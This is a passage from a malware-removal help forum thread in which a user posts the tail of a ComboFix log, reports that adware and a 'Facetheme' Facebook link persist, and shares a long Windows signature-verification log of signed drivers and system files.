c:\windows\system32\ibmpmsvc.exe
c:\program files\Alwil Software\Avast5\AvastSvc.exe
c:\windows\system32\WLANExt.exe
c:\program files\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\program files\Intel\WiFi\bin\EvtEng.exe
c:\windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
c:\program files\Common Files\Intel\WirelessCommon\RegSrvc.exe
c:\program files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
c:\program files\Lenovo\Client Security Solution\tvttcsd.exe
c:\windows\system32\DRIVERS\xaudio.exe
c:\program files\ThinkPad\ConnectUtilities\AcSvc.exe
c:\program files\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\program files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
c:\program files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
c:\windows\System32\TPHDEXLG.exe
c:\program files\Lenovo\Rescue and Recovery\rrservice.exe
c:\program files\TortoiseSVN\bin\TSVNCache.exe
c:\program files\Windows Media Player\wmpnscfg.exe
c:\program files\Windows Media Player\wmpnetwk.exe
.
**************************************************************************
.
Completion time: 2011-08-18 23:55:36 - machine was rebooted
ComboFix-quarantined-files.txt 2011-08-18 22:55
ComboFix2.txt 2011-08-18 12:15
ComboFix3.txt 2011-05-08 15:29
.
Pre-Run: 34,602,795,008 bytes free
Post-Run: 34,120,822,784 bytes free
.
Current=10 Default=10 Failed=1 LastKnownGood=11 Sets=1,2,3,4,5,6,7,8,9,10,11
- - End Of File - - F987FE36AF5EDDB04626F791E8837C66
  • 0

#48
Bismillah

Bismillah

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 514 posts
For some reason i need to turn avast manually when booting

The mass ads remain

Facetheme remains its got its web address on my facebook :)

Edited by nortan360, 18 August 2011 - 05:10 PM.

  • 0

#49
Bismillah

Bismillah

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 514 posts
Sigverif log


********************************

Microsoft Signature Verification

Log file generated on 19/08/2011 at 12:07
OS Platform: Windows (x86), Version: 6.0, Build: 6002, CSDVersion: Service Pack 2
Scan Results: Total Files: 282, Signed: 281, Unsigned: 0, Not Scanned: 1

File Modified Version Status Catalog Signed By
------------------ ------------ ----------- ------------ ----------- -------------------
[c:\program files\conexant\cnxt_audio_hda]
uiu32a.exe 22/04/2010 2:6.0 Signed tpunherz.cat Microsoft Windows Hardware Compatibility Publisher
[c:\program files\conexant\cnxt_modem_hda_hsf]
uiu32m.exe 09/04/2008 2:6.0 Signed tkp5051z.cat Microsoft Windows Hardware Compatibility Publisher
[c:\program files\synaptics\syntp]
instnt.exe 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synchiralrotate.mpg 17/09/2008 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synchiralvhscroll.mp 03/09/2008 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
syncntxt.rtf 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synflick.mpg 03/09/2008 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synisdll.dll 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synlinearvhscroll.mp 03/09/2008 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synmomentum.mpg 03/09/2008 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synmood.exe 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synpinch.mpg 03/09/2008 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synpivotrotate.mpg 10/04/2009 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synpivotrotate_chira 10/04/2009 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synthreefingerflick. 16/03/2009 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synthreefingersdown. 16/03/2009 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
syntpcom.dll 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
syntpcpl.dll 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
syntpenh.exe 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
syntphelper.exe 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
syntplpr.exe 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
syntpres.dll 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
syntwofingervhscroll 16/03/2009 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synunst.ini 30/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synzmetr.exe 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4-a123.gif 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4-asr.gif 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4-head.gif 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4-i.jpg 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4-img.jpg 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4-isr.jpg 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4-mg.gif 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4-note.gif 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4-sc.gif 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4sc_dk.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4sc_fi.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4sc_fr.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4sc_gr.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4sc_it.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4sc_jp.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4sc_nl.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4sc_no.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4sc_se.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4sc_sp.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4scrol.css 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4scrol.dat 13/10/2009 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4scrol.htm 14/08/2006 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tp4table.dat 13/10/2009 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tutorial.exe 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
[c:\windows]
atiogl.xml 16/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
[c:\windows\system32]
amdpcom32.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
ati2edxx.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
ati2evxx.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
ati2evxx.exe 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atiadlxx.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atibrtmon.exe 06/03/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atidemgx.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atidxx32.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atigktxx.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atiglpxx.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atiicdxx.dat 23/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atioglxx.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atipblag.dat 10/07/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atipdlxx.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atitmmxx.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atiu9pag.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atiumdag.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atiumdva.cap 06/07/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atiumdva.dat 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atiumdva.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atiuxpag.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
batt.dll 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
clfs.sys 11/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_25_for_KB948Microsoft Windows
cx32tp17.dll 05/10/2009 2:6.0 Signed tpunherz.cat Microsoft Windows Hardware Compatibility Publisher
e1000msg.dll 14/12/2007 2:6.0 Signed e1y6032.cat Microsoft Windows Hardware Compatibility Publisher
e1y6032.din 13/11/2008 2:6.0 Signed e1y6032.cat Microsoft Windows Hardware Compatibility Publisher
hal.dll 11/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
halacpi.dll 11/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
halmacpi.dll 11/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
hccoin.dll 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
hccutils.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
hcrstco.dll 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
hkcmd.exe 13/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
i2cw.dll 22/02/2008 2:5.00 Signed tvti2c.cat Microsoft Windows Hardware Compatibility Publisher
ibmpmsvc.exe 19/03/2009 2:5.00 Signed ibmpmdrv.cat Microsoft Windows Hardware Compatibility Publisher
ig4dev32.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
ig4icd32.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igcompkrng500.bin 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igd10umd32.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igdumd32.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igdumdx32.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfcg550.bin 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxcfg.exe 13/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxcpl.cpl 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxdev.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxdo.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxexps.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxext.exe 13/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxpers.exe 13/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxpph.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrara.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrchs.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrcht.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrcsy.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrdan.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrdeu.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrell.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrenu.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxresp.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxress.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrfin.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrfra.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrheb.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrhun.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrita.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrjpn.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrkor.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrnld.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrnor.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrplk.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrptb.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrptg.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrrus.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrsky.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrslv.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrsve.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrtha.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxrtrk.lrc 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxsrvc.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxsrvc.exe 13/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxtmm.dll 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxtray.exe 13/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igfxzoom.exe 13/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igkrng500.bin 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
iglhxc32.vp 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
iglhxo32.vp 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
iglhxs32.vp 13/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
iscsilog.dll 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
mdmxsdk.dll 09/04/2008 2:6.0 Signed tkp5051z.cat Microsoft Windows Hardware Compatibility Publisher
netw5c32.dll 20/06/2008 2:6.0 Signed netw5v32.cat Microsoft Windows Hardware Compatibility Publisher
netw5r32.dll 20/06/2008 2:6.0 Signed netw5v32.cat Microsoft Windows Hardware Compatibility Publisher
nicco26.dll 24/08/2007 2:6.0 Signed e1y6032.cat Microsoft Windows Hardware Compatibility Publisher
nicinsty.dll 25/03/2009 2:6.0 Signed e1y6032.cat Microsoft Windows Hardware Compatibility Publisher
oemdspif.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
streamci.dll 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
syncom.dll 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
synctrl.dll 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
syntpapi.dll 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
syntpco4.dll 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
sysfxui.dll 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
tpinspm.dll 19/03/2009 2:5.00 Signed ibmpmdrv.cat Microsoft Windows Hardware Compatibility Publisher
uci32a59.dll 06/07/2010 2:6.0 Signed tpunherz.cat Microsoft Windows Hardware Compatibility Publisher
uci32m27.dll 25/01/2008 2:6.0 Signed tkp5051z.cat Microsoft Windows Hardware Compatibility Publisher
wdfcoinstaller01005. 09/05/2009 2:5.00 Signed atswpwdf.cat Microsoft Windows Hardware Compatibility Publisher
wdfcoinstaller01009. 07/08/2009 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
wmalfxgfxdsp.dll 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
[c:\windows\system32\drivers]
1394bus.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
acpi.sys 11/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
afd.sys 21/04/2011 2:5.1,2:5.2,2:6.0 Signed Package_5_for_KB2503Microsoft Windows
asyncmac.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
atapi.sys 11/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_25_for_KB948Microsoft Windows
ati2erec.dll 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atikmdag.sys 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atikmpag.sys 19/09/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
ativcaxx.cpa 23/08/2006 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
ativcaxx.vp 23/08/2006 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
ativdkxx.vp 18/04/2007 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
ativokxx.vp 30/05/2007 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
ativpkxx.vp 30/05/2007 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
ativvpxx.vp 09/09/2007 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
atswpwdf.sys 27/10/2008 2:5.00 Signed atswpwdf.cat Microsoft Windows Hardware Compatibility Publisher
battc.sys 21/01/2008 2:5.1 Signed Package_30_for_KB936Microsoft Windows
cdrom.sys 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
chdrt32.sys 17/06/2010 2:6.0 Signed tpunherz.cat Microsoft Windows Hardware Compatibility Publisher
cmbatt.sys 21/01/2008 2:5.1 Signed Package_30_for_KB936Microsoft Windows
compbatt.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
crcdisk.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
csc.sys 10/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_52_for_KB948Microsoft Windows
disk.sys 11/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
drmk.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
drmkaud.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
dxgkrnl.sys 20/01/2011 2:5.1,2:5.2,2:6.0 Signed Package_23_for_KB211Microsoft Windows
e1y6032.sys 14/08/2009 2:6.0 Signed e1y6032.cat Microsoft Windows Hardware Compatibility Publisher
hdaudbus.sys 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
heci.sys 26/03/2008 2:5.00 Signed heci.cat Microsoft Windows Hardware Compatibility Publisher
hidclass.sys 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
hidparse.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
hidusb.sys 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
hsfprof.cty 25/03/2008 2:6.0 Signed tkp5051z.cat Microsoft Windows Hardware Compatibility Publisher
hsx_cnxt.sys 25/03/2008 2:6.0 Signed tkp5051z.cat Microsoft Windows Hardware Compatibility Publisher
hsx_dpv.sys 25/03/2008 2:6.0 Signed tkp5051z.cat Microsoft Windows Hardware Compatibility Publisher
hsxhwazl.sys 25/03/2008 2:6.0 Signed tkp5051z.cat Microsoft Windows Hardware Compatibility Publisher
http.sys 20/02/2010 2:5.1,2:5.2,2:6.0 Signed Package_12_for_KB973Microsoft Windows
i8042prt.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
iastor.sys 11/02/2009 2:5.1 Signed iaahci.cat Microsoft Windows Hardware Compatibility Publisher
ibmpmdrv.sys 19/03/2009 2:5.00 Signed ibmpmdrv.cat Microsoft Windows Hardware Compatibility Publisher
igdkmd32.sys 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
igdpmd32.sys 12/06/2008 2:6.0 Signed cl_69896.cat Microsoft Windows Hardware Compatibility Publisher
intelppm.sys 21/01/2008 2:5.1 Signed Package_30_for_KB936Microsoft Windows
kbdclass.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
ksecdd.sys 16/06/2009 2:5.1,2:5.2,2:6.0 Signed Package_5_for_KB9754Microsoft Windows
lltdio.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
manycam.sys 14/01/2008 2:5.00 Signed manycam.cat Microsoft Windows Hardware Compatibility Publisher
mdmxsdk.sys 09/04/2008 2:6.0 Signed tkp5051z.cat Microsoft Windows Hardware Compatibility Publisher
modem.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
monitor.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
mouclass.sys 21/01/2008 2:5.1 Signed Package_30_for_KB936Microsoft Windows
mouhid.sys 21/01/2008 2:5.1 Signed Package_30_for_KB936Microsoft Windows
mountmgr.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
mpsdrv.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
msahci.sys 05/08/2010 2:5.1,2:5.2,2:6.0 Signed Package_2_for_KB9595Microsoft Windows
msisadrv.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
msiscsi.sys 11/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
mskssrv.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
mspclock.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
mspqm.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
mssmbios.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
mstee.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
mux.sys 09/02/2009 2:6.0 Signed oem20.CAT Microsoft Windows Hardware Compatibility Publisher
ndis.sys 11/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_25_for_KB948Microsoft Windows
ndistapi.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
ndisuio.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
ndiswan.sys 10/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_25_for_KB948Microsoft Windows
netbt.sys 10/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_25_for_KB948Microsoft Windows
netw5v32.sys 09/02/2009 2:6.0 Signed netw5v32.cat Microsoft Windows Hardware Compatibility Publisher
nsiproxy.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
nwifi.sys 10/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_16_for_KB948Microsoft Windows
ohci1394.sys 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
pacer.sys 10/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_25_for_KB948Microsoft Windows
pci.sys 11/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
pcmcia.sys 11/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
peauth.sys 02/11/2006 2:6.0 Signed nt5.cat Microsoft Windows
portcls.sys 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
psadd.sys 25/09/2008 2:5.00 Signed psadd.cat Microsoft Windows Hardware Compatibility Publisher
rasacd.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
rasl2tp.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
raspppoe.sys 10/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_25_for_KB948Microsoft Windows
raspptp.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
rassstp.sys 10/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_86_for_KB948Microsoft Windows
rdpcdd.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
rdpdr.sys 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
rdpencdd.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
rimserial.sys 09/01/2009 2:5.00 Signed rimserial.cat Microsoft Windows Hardware Compatibility Publisher
rootmdm.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
rspndr.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
sermouse.sys 21/01/2008 2:5.1 Signed Package_30_for_KB936Microsoft Windows
smb.sys 10/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_25_for_KB948Microsoft Windows
smiif32.sys 12/05/2008 2:5.00,2:5.1,2:6.0 Signed lnvsmi-1.01.cat Microsoft Windows Hardware Compatibility Publisher
swenum.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
syntp.sys 23/04/2010 2:5.00 Signed syntp.cat Microsoft Windows Hardware Compatibility Publisher
tcpip.sys 17/06/2011 2:5.1,2:5.2,2:6.0 Signed Package_2_for_KB2563Microsoft Windows
tcpipreg.sys 08/12/2009 2:5.1,2:5.2,2:6.0 Signed Package_1_for_KB2563Microsoft Windows
tdx.sys 10/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_25_for_KB948Microsoft Windows
termdd.sys 11/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
tpm.sys 21/01/2008 2:5.1 Signed Package_30_for_KB936Microsoft Windows
